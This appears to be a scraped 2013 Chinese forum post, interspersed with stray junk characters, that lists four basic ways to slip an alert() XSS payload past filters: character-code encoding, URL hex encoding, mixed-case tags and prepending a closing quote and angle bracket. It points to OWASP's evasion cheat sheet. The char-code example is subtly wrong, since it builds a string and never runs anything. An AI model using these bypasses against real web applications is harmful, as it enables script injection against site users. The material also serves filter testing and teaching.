四种超级基础的绕过方法。, o6 c+ z2 H1 h9 A
1.转换为ASCII码
' ^; a1 _& L5 }例子:原脚本为<script>alert(‘I love F4ck’)</script >
8 r, v+ n; O* \; m* ]: s1 ]( z通过转换,变成:& I4 N- z; }9 B
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>3 l' c% c+ }. [: P; r, Z/ e
; K* G z1 E, a0 V- _2 d; t1 }2.转换为HEX(十六进制)$ l2 _( k4 I( y: W1 [* v; U' ~
例子:原脚本为<script>alert(‘I love F4ck’)</script>. v7 @9 i; L7 @ y& Q0 e
通过转换,变成:
( k3 G, b2 `# T7 y" g%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
! c! p3 Y, [1 y5 n( i. N $ A1 Y% t" o; d/ }5 L1 t
3.转换脚本的大小写4 C) l O) Y" M8 |# y
例子:原脚本为<script>alert(‘I love F4ck’)</script>. x! P, T+ L; l& f1 Z" B
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
- F j! u# V; \. v* S
1 H+ P- u6 W% r6 e4.增加闭合标记”>
# q# W/ S$ |" |9 M例子:原脚本为<script>alert(‘I love F4ck’)</script>
6 g; P" ~8 h2 b9 J: v转换为:”><script>alert(‘I love F4ck’)</script>% [+ x3 g1 I- B: w5 [6 J. q
更详细绕过技术请参考此网页
' n7 E/ N6 ^$ v! u) [+ xhttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet% _- }5 q: J+ j1 k% a; L4 `
+ M% s% B# `4 S, b+ X# L转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对